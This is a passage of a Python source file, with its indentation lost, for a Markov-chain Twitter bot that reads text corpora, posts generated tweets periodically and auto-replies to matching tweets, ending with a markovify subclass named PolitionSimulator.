"""Reads a text, and adds its stats to the internal data. Use the
mode keyword to overwrite the existing data, or to add the new
reading material to the existing data. NOTE: Only text files can be
read! (This includes .txt files, but can also be .py or other script
files if you want to be funny and create an auto-programmer.)
Arguments
filename - String that indicates the path to a .txt file
that should be read by the bot.
Keyword Arguments
database - A string that indicates the name of the
specific database that you want to add the
file's data to, or u'default' to add to the
default database. (default = 'default')
overwrite - Boolean that indicates whether the existing data
should be overwritten (True) or not (False). The
default value is False.
"""
# Clear the current data if required
if overwrite:
self.clear_data(database=database)
# Check whether the file exists
if not self._check_file(filename):
self._error(u'read', u"File does not exist: '%s'" % (filename))
# Read the words from the file as one big string
with open(filename, u'r') as f:
# Read the contents of the file
contents = f.read()
# Unicodify the contents
contents = contents
#.decode(u'utf-8')
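# NOTE: PolitionSimulator is not imported or defined in this file; it is
# presumably a markovify.Text subclass provided elsewhere in the project.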
bot = PolitionSimulator(contents)
self.bot = bot
#self.data[database] = bot
'''# Split the words into a list
words = contents.split()
# Create a new database if this is required.
if not database in self.data.keys():
self._message(u'read',
u"Creating new database '%s'" % (database))
self.data[database] = {}
# Add the words and their likely following word to the database
for w1, w2, w3 in self._triples(words):
# Only use actual words and words with minimal interpunction
if self._isalphapunct(w1) and self._isalphapunct(w2) and \
self._isalphapunct(w3):
# The key is a duo of words
key = (w1, w2)
# Check if the key is already part of the database dict
if key in self.data[database]:
# If the key is already in the database dict,
# add the third word to the list
self.data[database][key].append(w3)
else:
# If the key is not in the database dict yet, first
# make a new list for it, and then add the new word
self.data[database][key] = [w3]'''
def read_pickle_data(self, filename, overwrite=False):
"""Reads a database dict form a pickle file
Arguments
filepath - A string that indicates the path of the new
pickle file
Keyword Arguments
overwrite - Boolean that indicates whether the existing data
should be overwritten (True) or not (False). The
default value is False.
"""
# Check whether the file exists
if not self._check_file(filename, allowedext=[u'.pickle', u'.dat']):
self._error(u'read_pickle_data',
u"File does not exist: '%s'" % (filename))
# Load a database from a pickle file
with open(filename, u'rb') as f:
data = pickle.load(f)
# Store the data internally
if overwrite:
self.clear_data(database=None)
self.data = copy.deepcopy(data)
else:
for database in data.keys():
for key in data[database].keys():
# If the key is not in the existing dataset yet, add it,
# then copy the loaded data into the existing data
if key not in self.data[database].keys():
self.data[database][key] = copy.deepcopy(
data[database][key])
# If the key is already in the existing data, add the
# loaded data to the existing list
else:
self.data[database][key].extend(
copy.deepcopy(data[database][key]))
# Get rid of the loaded data
del data
def set_simple_responses(self, respdict, overwrite=False):
"""Adds
Arguments
respdict - A dict that has keys that exactly match
intended target strings for auto-replying.
Each key points to a list of possible
replies (strings) to the intended target
string. One reply will be chosen at random
if the twitter_autoreply_start is called
with database='simpleresponse'.
Alternatively, values in the respdict can
also be single strings, which will then
always be used to reply to the intended
target string.
Keyword Arguments
overwrite - Boolean that indicates whether the existing data
should be overwritten (True) or not (False). The
default value is False.
"""
# Check if the 'simpleresponse' database already exists, and
# create it if necessary.
if not u'simpleresponse' in self.data.keys():
self.data[u'simpleresponse'] = {}
# Overwrite the database if requested.
if overwrite:
self.data[u'simpleresponse'] = {}
# Go through the passed respdict, and add its content to the
# database.
for targetstring in respdict.keys():
# Skip non-text values.
if type(targetstring) not in [str]:
self._message(u'set_simple_responses',
u"Key '%s' in passed respdict is not a string or unicode type, and thus will not be included in the database." % (targetstring))
continue
# Check if the value for this targetstring is text.
if type(respdict[targetstring]) in [str]:
# Convert to a tuple, and add to the database.
self.data[u'simpleresponse'][targetstring] = \
(respdict[targetstring],)
# Check if the value for this targetstring is a list or a
# tuple.
elif type(respdict[targetstring]) in [list, tuple]:
# Copy the values, convert them all to unicode.
responses = map(str, list(respdict[targetstring]))
# Add the responses to the database.
self.data[u'simpleresponse'][targetstring] = \
tuple(responses)
# For any other data type, report a warning.
else:
self._message(u'set_simple_responses',
u"Key '%s' in passed respdict points to invalid data. Values need to be of type str, unicode, list, or tuple." % (targetstring))
def twitter_autoreply_start(self, targetstring, database=u'default',
keywords=None, prefix=None, suffix=None, maxconvdepth=None,
mindelay=1.5):
"""Starts the internal Thread that replies to all tweets that match
the target string.
For an explanation of the target string, see the Twitter dev site:
https://dev.twitter.com/streaming/overview/request-parameters#track
Arguments
targetstring - String that the bot should look out for. For
more specific information, see Twitter's
developer website (URL mentioned above).
Keyword Arguments
database - A string that indicates the name of the
specific database that you want to use to
generate tweets, or a list of database names
from which one will be selected at random,
or u'default' to use the default database.
You can also use the string 'auto-language'
to make the bot automatically detect the
language of Tweets, and to reply using a
database with the same name (e.g. 'en' for
English, or 'de' for German). Note that this
option relies on Twitter's language-detection
algorithms. If a language cannot be
identified, the fall-back will be 'en', or
'default' when 'en' is not available. Another
option is to use database='random-database',
which will select one of the non-empty
databases that are available to this bot.
Yet another option is to use
database='simpleresponse', which will select
a response from the list of available
responses from the 'simpleresponse' database.
You can add to this database by using the
set_simple_response method. Default value is
'default'.
keywords - A list of words that the bot should recognise in
tweets that it finds through its targetstring.
The bot will attempt to use the keywords it finds
to start its reply with. If more than one
keyword occurs in a tweet, the position of each
word in the keywords list will determine its
priority. I.e. if both keywords[0] and
keywords[1] occur in a tweet, an attempt will be
made to reply with keywords[0] first. If that
does not exist in the database, the next keyword
that was found in a tweet will be used (provided
it occurs in the keywords list).
prefix - A string that will be added at the start of
each tweet (no ending space required), or a
list of potential prefixes from which one
will be chosen at random. Pass None if you
don't want a prefix. Default value is None.
suffix - A string that will be added at the end of
each tweet (no starting space required), or
a list of potential suffixes from which one
will be chosen at random. Pass None if you
don't want a suffix. Default value is None.
maxconvdepth - Integer that determines the maximal depth of the
conversations that this bot is allowed to reply
to. This is useful if you want your bot to reply
to the Twitter handles of specific
people. If you are going to do this, please keep
this value low to prevent the bot from becoming
spammy. You can also set this keyword to None,
which is appropriate if you ask the bot to reply
to a very specific hashtag or your own Twitter
handle (i.e. a situation in which the bot is
solicited to respond). Default value is None.
mindelay - A float that indicates the minimal time
between tweets in minutes. Default is 1.5
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'twitter_autoreply_start',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Raise an Exception if the passed intended database is
# 'simpleresponse' and the targetstring is not in the keys of the
# 'simpleresponse' database.
if database == u'simpleresponse':
if targetstring not in self.data[u'simpleresponse'].keys():
self._error(u'twitter_autoreply_start',
u"Targetstring '%s' was not found in the 'simpleresponse' database. Use the set_simple_responses function to add simple responses." % (targetstring))
# Update the autoreply parameters
self._autoreply_database = database
self._targetstring = targetstring
self._keywords = keywords
self._tweetprefix = prefix
self._tweetsuffix = suffix
self._maxconvdepth = maxconvdepth
self._mindelay = mindelay
# Signal the _autoreply thread to continue
self._autoreplying = True
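# Example (hedged; the handle is a placeholder):
#   mb.twitter_autoreply_start(u'@examplebot', mindelay=2.0)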
def twitter_autoreply_stop(self):
"""Stops the Thread that replies to all tweets that match the target
string.
For an explanation of the target string, see the Twitter dev site:
https://dev.twitter.com/streaming/overview/request-parameters#track
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'twitter_autoreply_stop',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Update the autoreply parameters
self._autoreply_database = None
self._targetstring = None
self._keywords = None
self._tweetprefix = None
self._tweetsuffix = None
# Signal the _autoreply thread to pause
self._autoreplying = False
def twitter_login(self, cons_key, cons_secret, access_token,
access_token_secret):
"""Logs in to Twitter, using the provided access keys. You can get
these for your own Twitter account at apps.twitter.com
Arguments
cons_key - String of your Consumer Key (API Key)
cons_secret - String of your Consumer Secret (API Secret)
access_token - String of your Access Token
access_token_secret
- String of your Access Token Secret
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(
u'twitter_login', u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Log in to a Twitter account
self._oauth = twitter.OAuth(access_token, access_token_secret,
cons_key, cons_secret)
self._t = twitter.Twitter(auth=self._oauth)
self._ts = twitter.TwitterStream(auth=self._oauth)
self._loggedin = True
# Get the bot's own user credentials
self._credentials = self._t.account.verify_credentials()
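# Example (the four keys are placeholders obtained from apps.twitter.com):
#   mb.twitter_login(u'CONS_KEY', u'CONS_SECRET', u'TOKEN', u'TOKEN_SECRET')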
def twitter_tweeting_start(self, database=u'default', days=1, hours=0,
minutes=0, jitter=0, keywords=None, prefix=None, suffix=None):
"""Periodically posts a new tweet with generated text. You can
specify the interval between tweets in days, hours, or minutes, or
by using a combination of all. (Not setting anything will result in
the default value of a 1 day interval.) You can also add optional
jitter, which makes your bot a bit less predictable.
Keyword arguments
database - A string that indicates the name of the
specific database that you want to use to
generate tweets, or a list of database names
from which one will be selected at random,
or u'default' to use the default database.
You can also use the string 'random-database'
to select one of the non-empty databases
that are available to this bot. Default
value is 'default'.
days - Numeric value (int or float) that indicates the
amount of days between each tweet.
hours - Numeric value (int or float) that indicates the
amount of hours between each tweet.
minutes - Numeric value (int or float) that indicates the
amount of minutes between each tweet.
jitter - Integer or float that indicates the jitter (in
minutes!) that is applied to your tweet. The
jitter is uniform, and on both ends of the delay
value. For example, a jitter of 30 minutes on a
tweet interval of 12 hours, will result in actual
intervals between 11.5 and 12.5 hours.
prefix - A string that will be added at the start of
each tweet (no ending space required), or a
list of potential prefixes from which one
will be chosen at random. Pass None if you
don't want a prefix. Default value is None.
suffix - A string that will be added at the end of
each tweet (no starting space required), or
a list of potential suffixes from which one
will be chosen at random. Pass None if you
don't want a suffix. Default value is None.
keywords - A list of words from which one is randomly
selected and used to attempt to start a tweet
with. If None is passed, the bot will free-style.
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'twitter_tweeting_start',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Clean up the values. (Check for None first: on Python 3, comparing
# None with > raises a TypeError.)
if (days == None) or not (days > 0):
days = 0
if (hours == None) or not (hours > 0):
hours = 0
if (minutes == None) or not (minutes > 0):
minutes = 0
# Calculate the tweet interval in minutes
tweetinterval = (days * 24 * 60) + (hours * 60) + minutes
# If the tweetinterval wasn't set, default to 1 day
# (Thats 24 hours * 60 minutes per hour = 1440 minutes)
if tweetinterval == 0:
tweetinterval = 1440
# Update the autotweeting parameters
self._tweetingdatabase = database
self._tweetinginterval = tweetinterval
self._tweetingjitter = jitter
self._tweetingkeywords = keywords
self._tweetingprefix = prefix
self._tweetingsuffix = suffix
# Signal the _autotweet thread to continue
self._autotweeting = True
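# Example: tweet roughly every 6 hours, with up to 30 minutes of jitter:
#   mb.twitter_tweeting_start(hours=6, jitter=30)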
def twitter_tweeting_stop(self):
"""Stops the periodical posting of tweets with generated text.
"""
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'twitter_tweeting_stop',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Update the autotweeting parameters
self._tweetingdatabase = None
self._tweetinginterval = None
self._tweetingjitter = None
self._tweetingkeywords = None
self._tweetingprefix = None
self._tweetingsuffix = None
# Signal the _autotweet thread to pause
self._autotweeting = False
def _autoreply(self):
"""Continuously monitors Twitter Stream and replies when a tweet
appears that matches self._targetstring. It will include
self._tweetprefix and self._tweetsuffix in the tweets, provided they
are not None.
"""
# Run indefinitively
while self._autoreplythreadlives:
# Wait a bit before rechecking whether autoreplying should be
# started. It's highly unlikely the bot will miss something if
# it is a second late, and checking continuously is a waste of
# resources.
time.sleep(1)
# Check whether the Threads are still alive, and revive if
# they aren't. (NOTE: This will not actually work if the
# auto-replying Thread is dead, because that is what's
# running this function. It will, however, revive the other
# Threads if they are dead. The other Threads also have _cpr
# calls, which serve to revive this Thread. Brilliant, no?)
self._cpr()
# Only start when the bot logs in to twitter, and when a
# target string is available
if self._loggedin and self._targetstring != None:
# Acquire the TwitterStream lock
self._tslock.acquire(True)
# Create a new iterator from the TwitterStream
iterator = self._ts.statuses.filter(track=self._targetstring)
# Release the TwitterStream lock
self._tslock.release()
# Only check for tweets when autoreplying
while self._autoreplying:
# Get a new Tweet (this will block until a new
# tweet becomes available, but can also raise a
# StopIteration Exception every now and again.)
try:
# Attempt to get the next tweet.
tweet = iterator.__next__()
except StopIteration:
# Restart the iterator, and skip the rest of
# the loop.
iterator = self._ts.statuses.filter(
track=self._targetstring)
continue
# Restart the connection if this is a 'hangup'
# notification, which will be {'hangup':True}
if u'hangup' in tweet.keys():
# Reanimate the Twitter connection.
self._twitter_reconnect()
# Skip further processing.
continue
# Store a copy of the latest incoming tweet, for
# debugging purposes
self._lasttweetin = copy.deepcopy(tweet)
# Only proceed if autoreplying is still required (there
# can be a delay before the iterator produces a new tweet, and
# by that time autoreplying might already be stopped)
if not self._autoreplying:
# Skip one cycle, which will likely also make the
# the while self._autoreplying loop stop
continue
# Report to console
self._message(u'_autoreply', u"I've found a new tweet!")
try:
self._message(u'_autoreply', u'%s (@%s): %s' %
(tweet[u'user'][u'name'],
tweet[u'user'][u'screen_name'], tweet[u'text']))
except:
self._message(u'_autoreply',
u'Failed to report on new Tweet :(')
# Don't reply to this bot's own tweets
if tweet[u'user'][u'id_str'] == self._credentials[u'id_str']:
# Skip one cycle, which will bring us to the
# next tweet
self._message(u'_autoreply',
u"This tweet was my own, so I won't reply!")
continue
# Don't reply to retweets
if u'retweeted_status' in tweet.keys():
# Skip one cycle, which will bring us to the
# next tweet
self._message(u'_autoreply',
u"This was a retweet, so I won't reply!")
continue
# Don't reply to tweets that are in the nono-list
if tweet[u'id_str'] in self._nonotweets:
# Skip one cycle, which will bring us to the
# next tweet
self._message(u'_autoreply',
u"This tweet was in the nono-list, so I won't reply!")
continue
# Skip tweets that are too deep into a conversation
if self._maxconvdepth != None:
# Get the ID of the tweet that the current tweet
# was a reply to
orid = tweet[u'in_reply_to_status_id_str']
# Keep digging through the tweets until the
# top-level tweet is found, or until we pass the
# maximum conversation depth
counter = 0
while orid != None and orid not in self._nonotweets:
# If the current in-reply-to-ID is not None,
# the current tweet was a reply. Increase
# the reply counter by one.
ortweet = self._t.statuses.show(id=orid)
orid = ortweet[u'in_reply_to_status_id_str']
counter += 1
# Stop counting when the current value
# exceeds the maximum allowed depth
if counter >= self._maxconvdepth:
# Add the current tweet's ID to the list
# of tweets that this bot should not
# reply to. (Keeping track prevents
# excessive use of the Twitter API by
# continuously asking for the
# in-reply-to-ID of tweets)
self._nonotweets.append(orid)
# Don't reply if this tweet is a reply in a tweet
# conversation of more than self._maxconvdepth tweets,
# or if the tweet's ID is in this bot's list of
# tweets that it shouldn't reply to
if counter >= self._maxconvdepth or \
orid in self._nonotweets:
self._message(u'_autoreply',
u"This tweet is part of a conversation, and I don't reply to conversations with over %d tweets." % (self._maxconvdepth))
continue
# Detect the language of the tweet, if the
# language of the reply depends on it.
if self._autoreply_database == u'auto-language':
# Get the language of the tweet, or default
# to English if it isn't available.
if u'lang' in tweet.keys():
lang = tweet[u'lang'].lower()
self._message(
u'_autoreply', u"I detected language: '%s'." % (lang))
else:
lang = u'en'
self._message(
u'_autoreply', u"I couldn't detect the language, so I defaulted to '%s'." % (lang))
# Check if the language is available in the
# existing dicts. Select the associated
# database, or default to English when the
# detected language isn't available, or
# default to u'default' when English is not
# available.
if lang in self.data.keys():
database = lang
self._message(
u'_autoreply', u"I chose database: '%s'." % (database))
elif u'en' in self.data.keys():
database = u'en'
self._message(
u'_autoreply', u"There was no database for detected language '%s', so I defaulted to '%s'." % (lang, database))
else:
database = u'default'
self._message(
u'_autoreply', u"There was no database for detected language '%s', nor for 'en', so I defaulted to '%s'." % (lang, database))
# Randomly choose a database if a random database
# was requested. Never use an empty database,
# though (the while loop prevents this).
elif self._autoreply_database == u'random-database':
database = random.choice(list(self.data.keys()))
while self.data[database] == {} or database == u'simpleresponse':
database = random.choice(list(self.data.keys()))
self._message(u'_autoreply',
u'Randomly chose database: %s' % (database))
# Randomly choose a database out of a list of
# potential databases.
elif type(self._autoreply_database) in [list, tuple]:
database = random.choice(self._autoreply_database)
self._message(u'_autoreply',
u'Randomly chose database: %s' % (database))
# Use the preferred database.
elif type(self._autoreply_database) in [str]:
database = copy.deepcopy(self._autoreply_database)
self._message(u'_autoreply',
u'Using database: %s' % (database))
# If none of the above options apply, default to
# the default database.
else:
database = u'default'
self._message(u'_autoreply',
u'Defaulted to database: %s' % (database))
# If the selected database is not a string, or if
# it is empty, then fall back on the default
# database.
if type(database) not in [str]:
self._message(u'_autoreply',
u"Selected database '%s' is invalid, defaulting to: %s" % (database, u'default'))
database = u'default'
elif database not in self.data.keys():
self._message(u'_autoreply',
u"Selected database '%s' does not exist, defaulting to: %s" % (database, u'default'))
database = u'default'
elif self.data[database] == {}:
self._message(u'_autoreply',
u"Selected database '%s' is empty, defaulting to: %s" % (database, u'default'))
database = u'default'
# Separate the words in the tweet
tw = tweet[u'text'].split()
# Clean up the words in the tweet
for i in range(len(tw)):
# Remove clutter
tw[i] = tw[i].replace(u'@', u''). \
replace(u'#', u'').replace(u'.', u''). \
replace(u',', u'').replace(u';', u''). \
replace(u':', u'').replace(u'!', u''). \
replace(u'?', u'').replace(u"'", u'')
# Make a list of potential seed words in the tweet
seedword = []
if self._keywords != None:
for kw in self._keywords:
# Check if the keyword is in the list of
# words from the tweet
if kw in tw:
seedword.append(kw)
# If there are no potential seeds in the tweet, None
# will lead to a random word being chosen
if len(seedword) == 0:
seedword = None
# Report back on the chosen keyword
self._message(
u'_autoreply', u"I found seedwords: '%s'." % (seedword))
# Construct a prefix for this tweet, which should
# include the handle ('@example') of the sender
if self._tweetprefix == None:
prefix = u'@%s' % (tweet[u'user'][u'screen_name'])
else:
# Use the specified prefix.
if type(self._tweetprefix) in [str]:
prefix = u'@%s %s' % \
(tweet[u'user'][u'screen_name'],
self._tweetprefix)
# Randomly choose one of the specified
# prefixes.
elif type(self._tweetprefix) in [list, tuple]:
prefix = u'@%s %s' % \
(tweet[u'user'][u'screen_name'],
random.choice(self._tweetprefix))
# Fall back on the default option.
else:
prefix = u'@%s' % (tweet[u'user'][u'screen_name'])
self._message(u'_autoreply',
u"Could not recognise the type of prefix '%s'; using no prefix." % (self._tweetprefix))
# Construct a suffix for this tweet. We use the
# specified suffix, which can also be None. Or
# we randomly select one from a list of potential
# suffixes.
if self._tweetsuffix == None:
suffix = copy.deepcopy(self._tweetsuffix)
elif type(self._tweetsuffix) in [str]:
suffix = copy.deepcopy(self._tweetsuffix)
elif type(self._tweetsuffix) in [list, tuple]:
suffix = random.choice(self._tweetsuffix)
else:
suffix = None
self._message(u'_autoreply',
u"Could not recognise the type of suffix '%s'; using no suffix." % (self._tweetsuffix))
# If the database is set to 'simpleresponse',
# choose a tweet from the simpleresponse database.
if database == u'simpleresponse':
response = u'%s %s' % (prefix,
random.choice(self.data[u'simpleresponse'][self._targetstring]))
# Only add the suffix when one is set, to avoid a literal 'None'
if suffix != None:
response = u'%s %s' % (response, suffix)
if len(response) > 140:
response = response[:140]
# Construct a new tweet using the database.
else:
response = self._construct_tweet(
database=database, seedword=seedword,
prefix=prefix, suffix=suffix)
# Acquire the twitter lock
self._tlock.acquire(True)
# Reply to the incoming tweet
try:
# Post a new tweet
resp = self._t.statuses.update(status=response,
in_reply_to_status_id=tweet[u'id_str'],
in_reply_to_user_id=tweet[u'user'][u'id_str'],
in_reply_to_screen_name=tweet[u'user'][u'screen_name']
)
# Report to the console
self._message(
u'_autoreply', u'Posted reply: %s' % (response))
# Store a copy of the latest outgoing tweet, for
# debugging purposes
self._lasttweetout = copy.deepcopy(resp)
except Exception as e:
self._error(u'_autoreply',
u"Failed to post a reply: '%s'" % (e))
# Release the twitter lock
self._tlock.release()
# Wait for the minimal tweeting delay.
time.sleep(60.0 * self._mindelay)
def _autotweet(self):
"""Automatically tweets on a periodical basis.
"""
# Run indefinitely
while self._tweetingthreadlives:
# Wait a bit before rechecking whether tweeting should be
# started. It's highly unlikely the bot will miss something if
# it is a second late, and checking continuously is a waste of
# resources.
time.sleep(1)
# Check whether the Threads are still alive, and revive if
# they aren't. (NOTE: This will not actually work if the
# auto-tweeting Thread is dead, because that is what's
# running this function. It will, however, revive the other
# Threads if they are dead. The other Threads also have _cpr
# calls, which serve to revive this Thread. Brilliant, no?)
self._cpr()
# Only start when the bot logs in to twitter, and when tweeting
# is supposed to happen
while self._loggedin and self._autotweeting:
# Choose a random keyword
kw = None
if self._tweetingkeywords != None:
if type(self._tweetingkeywords) in \
[str]:
kw = self._tweetingkeywords
else:
kw = random.choice(self._tweetingkeywords)
# Choose the database to use. If the database should be
# random, then randomly choose a non-empty database.
if self._tweetingdatabase == u'random-database':
database = random.choice(list(self.data.keys()))
while self.data[database] == {} or database == u'simpleresponse':
database = random.choice(list(self.data.keys()))
self._message(u'_autotweet',
u'Randomly chose database: %s' % (database))
# If the database is a list of alternatives, randomly
# select one.
elif type(self._tweetingdatabase) in [list, tuple]:
database = random.choice(self._tweetingdatabase)
# If the specified database is a string, use it.
elif type(self._tweetingdatabase) in [str]:
database = copy.deepcopy(self._tweetingdatabase)
# Fall back on the default option.
else:
self._message(u'_autotweet',
u"Could not recognise the type of database '%s'; using '%s' instead." % (self._tweetingdatabase, u'default'))
database = u'default'
# Construct a prefix for this tweet. We use the
# specified prefix, which can also be None. Or
# we randomly select one from a list of potential
# prefixes.
if self._tweetingprefix == None:
prefix = copy.deepcopy(self._tweetingprefix)
elif type(self._tweetingprefix) in [str]:
prefix = copy.deepcopy(self._tweetingprefix)
elif type(self._tweetingprefix) in [list, tuple]:
prefix = random.choice(self._tweetingprefix)
else:
prefix = None
self._message(u'_autotweet',
u"Could not recognise the type of prefix '%s'; using no suffix." % (self._tweetingprefix))
# Construct a suffix for this tweet. We use the
# specified suffix, which can also be None. Or
# we randomly select one from a list of potential
# suffixes.
if self._tweetingsuffix == None:
suffix = copy.deepcopy(self._tweetingsuffix)
elif type(self._tweetingsuffix) in [str]:
suffix = copy.deepcopy(self._tweetingsuffix)
elif type(self._tweetingsuffix) in [list, tuple]:
suffix = random.choice(self._tweetingsuffix)
else:
suffix = None
self._message(u'_autotweet',
u"Could not recognise the type of suffix '%s'; using no suffix." % (self._tweetingsuffix))
# Construct a new tweet
newtweet = self._construct_tweet(database=database,
seedword=kw, prefix=prefix, suffix=suffix)
# Acquire the twitter lock
self._tlock.acquire(True)
# Reply to the incoming tweet
try:
# Post a new tweet
tweet = self._t.statuses.update(status=newtweet)
# Report to the console
self._message(u'_autotweet',
u'Posted tweet: %s' % (newtweet))
# Store a copy of the latest outgoing tweet, for
# debugging purposes
self._lasttweetout = copy.deepcopy(tweet)
except:
# Reconnect to Twitter.
self._twitter_reconnect()
# Try to post again.
try:
# Post a new tweet
tweet = self._t.statuses.update(status=newtweet)
# Report to the console
self._message(u'_autotweet',
u'Posted tweet: %s' % (newtweet))
# Store a copy of the latest outgoing tweet,
# for debugging purposes
self._lasttweetout = copy.deepcopy(tweet)
except Exception as e:
self._error(
u'_autotweet', u"Failed to post a tweet! Error: '%s'" % (e))
# Release the twitter lock
self._tlock.release()
# Determine the next tweeting interval in minutes
jitter = random.randint(-self._tweetingjitter,
self._tweetingjitter)
interval = self._tweetinginterval + jitter
# Sleep for the interval (in seconds, hence * 60)
self._message(u'_autotweet',
u'Next tweet in %d minutes.' % (interval))
time.sleep(interval * 60)
def _check_file(self, filename, allowedext=None):
"""Checks whether a file exists, and has a certain extension.
Arguments
filename - String that indicates the path to a .txt file
that should be read by the bot.
Keyword Arguments
allowedext - List of allowed extensions, or None to allow all
extensions. Default value is None.
Returns
ok - Boolean that indicates whether the file exists,
and has an allowed extension (True), or does not
(False)
"""
# Check whether the file exists
ok = os.path.isfile(filename)
# Check whether the extension is allowed
if allowedext != None:
name, ext = os.path.splitext(filename)
if ext not in allowedext:
ok = False
return ok
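# Illustrative call (file name hypothetical): _check_file(u'corpus.txt',
# allowedext=[u'.txt']) returns True only if 'corpus.txt' exists and its
# os.path.splitext extension appears in the allowed list.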
def _cpr(self):
"""Checks on the Threads that are supposed to be running, and
revives them when they are dead.
"""
# Check on the auto-reply Thread.
if self._autoreplythreadlives:
# Check if the Thread is still alive.
if not self._autoreplythread.is_alive():
# Report on the reviving.
self._message(
u'_cpr', u'_autoreplythread died; trying to revive!')
# Restart the Thread.
self._autoreplythread = Thread(target=self._autoreply)
self._autoreplythread.daemon = True
self._autoreplythread.name = u'autoreplier'
self._autoreplythread.start()
# Report on success!
self._message(
u'_cpr', u'Successfully restarted _autoreplythread!')
# Check on the tweeting Thread.
if self._tweetingthreadlives:
# Check if the Thread is still alive.
if not self._tweetingthread.is_alive():
# Report on the reviving.
self._message(
u'_cpr', u'_tweetingthread died; trying to revive!')
# Restart the Thread.
self._tweetingthread = Thread(target=self._autotweet)
self._tweetingthread.daemon = True
self._tweetingthread.name = u'autotweeter'
self._tweetingthread.start()
# Report on success!
self._message(
u'_cpr', u'Successfully restarted _tweetingthread!')
# Check on the self-examination Thread.
if self._selfexaminationthreadlives:
# Check if the Thread is still alive.
if not self._selfexaminationthread.is_alive():
# Report on the reviving.
self._message(
u'_cpr', u'Ironically, _selfexaminationthread died; trying to revive!')
# Restart the Thread.
self._selfexaminationthread = Thread(target=self._self_examination)
self._selfexaminationthread.daemon = True
self._selfexaminationthread.name = u'selfexaminer'
self._selfexaminationthread.start()
# Report on success!
self._message(
u'_cpr', u'Successfully restarted _selfexaminationthread!')
def _construct_tweet(self, database=u'default', seedword=None,
prefix=None, suffix=None):
"""Constructs a text for a tweet, based on the current Markov chain.
The text will be of a length of 140 characters or less, and will
contain a maximum of 20 words (excluding the prefix and suffix)
Keyword Arguments
seedword - A string that indicates what word should be in
the sentence. If None is passed, or if the word
is not in the database, a random word will be
chosen. This value can also be a list of words,
in which case the list will be processed
one-by-one until a word is found that is in the
database. Default value is None.
database - A string that indicates the name of the
specific database that you want to use to
generate the text, or u'default' to use the
default database. (default = 'default')
prefix - A string that will be added at the start of each
tweet (no ending space required). Pass None if
you don't want a prefix. Default value is None.
suffix - A string that will be added at the end of each
tweet (no starting space required). Pass None if
you don't want a suffix. Default value is None.
Returns
tweet - A string with a maximum length of 140 characters.
"""
sl = 20
response = u''
while response == u'' or len(response) > 140:
# Generate some random text
response = self.generate_text(sl, seedword=seedword,
database=database, verbose=False, maxtries=100)
# Add the prefix
if prefix != None:
response = u'%s %s' % (prefix, response)
# Add the suffix
if suffix != None:
response = u'%s %s' % (response, suffix)
# Reduce the amount of words if the response is too long
if len(response) > 140:
sl -= 1
return response
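# Usage sketch (values hypothetical): _construct_tweet(seedword=u'hello',
# prefix=u'@example', suffix=u'#bot') keeps regenerating text, shrinking
# sl by one word per pass, until the assembled '@example ... #bot' string
# fits within 140 characters.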
def _error(self, methodname, msg):
"""Raises an Exception on behalf of the method involved.
Arguments
methodname - String indicating the name of the method that is
throwing the error.
msg - String with the error message.
"""
raise Exception(u"ERROR in Markovbot.%s: %s" % (methodname, msg))
def _isalphapunct(self, string):
"""Returns True if all characters in the passed string are
alphabetic or punctuation, and there is at least one character in
the string.
Allowed punctuation is . , ; : ' " ! ?
Arguments
string - String that needs to be checked.
Returns
ok - Boolean that indicates whether the string
contains only letters and allowed punctuation
(True) or not (False).
"""
if string.replace(u'.', u'').replace(u',', u'').replace(u';', u''). \
replace(u':', u'').replace(u'!', u'').replace(u'?', u''). \
replace(u"'", u'').replace(u'"', u'').isalpha():
return True
else:
return False
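# Examples: _isalphapunct(u'Hello!') is True, since 'Hello' is alphabetic
# once the '!' is stripped; _isalphapunct(u'route66') is False (digits
# remain), as is _isalphapunct(u'two words') (the space is neither a
# letter nor allowed punctuation).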
def _message(self, methodname, msg):
"""Prints a message on behalf of the method involved. Friendly
version of self._error
Arguments
methodname - String indicating the name of the method that is
throwing the error.
msg - String with the message.
"""
print(u"MSG from Markovbot.%s: %s" % (methodname, msg))
def _self_examination(self):
"""This function runs in the self-examination Thread, and
continuously checks whether the other Threads are still alive.
"""
# Run until the Boolean is set to False.
while self._selfexaminationthreadlives:
# Sleep for a bit to avoid wasting resources.
time.sleep(5)
# Check if the Threads are alive, and revive if necessary.
self._cpr()
def _triples(self, words):
"""Generate triplets from the word list
This is inspired by Shabda Raaj's blog on Markov text generation:
http://agiliq.com/blog/2009/06/generating-pseudo-random-text-with-markov-chains-u/
Moves over the words, and returns three consecutive words at a time.
On each call, the function moves one word to the right. For example,
"What a lovely day" would result in (What, a, lovely) on the first
call, and in (a, lovely, day) on the next call.
Arguments
words - List of strings.
Yields
(w1, w2, w3) - Tuple of three consecutive words
"""
# We can only do this trick if there are at least three words
if len(words) < 3:
return
for i in range(len(words) - 2):
yield (words[i], words[i + 1], words[i + 2])
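# Example from the docstring: list(self._triples([u'What', u'a',
# u'lovely', u'day'])) yields [(u'What', u'a', u'lovely'),
# (u'a', u'lovely', u'day')]; fewer than three words yields nothing.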
def _twitter_reconnect(self):
"""Logs in to Twitter, using the stored OAuth. This function is
intended for internal use, and should ONLY be called after
twitter_login has been called.
"""
# Report the reconnection attempt.
self._message(u'_twitter_reconnect',
u"Attempting to reconnect to Twitter.")
# Raise an Exception if the twitter library wasn't imported
if not IMPTWITTER:
self._error(u'_twitter_reconnect',
u"The 'twitter' library could not be imported. Check whether it is installed correctly.")
# Log in to a Twitter account
self._t = twitter.Twitter(auth=self._oauth)
self._ts = twitter.TwitterStream(auth=self._oauth)
self._loggedin = True
# Get the bot's own user credentials
self._credentials = self._t.account.verify_credentials()
# Report the reconnection success.
self._message(u'_twitter_reconnect',
u"Successfully reconnected to Twitter!")
class PolitionSimulator(markovify.Text):
html_parser = HTMLParser()
def test_sentence_input(self, sentence):
return True
def _prepare_text(self, text):
text = html.escape(text, quote=False)
text = text.strip()
if not text.endswith((".", "?", "!")):
text += "."
return text
def sentence_split(self, text):
# split everything up by newlines, prepare them, and join back together
lines = text.splitlines()
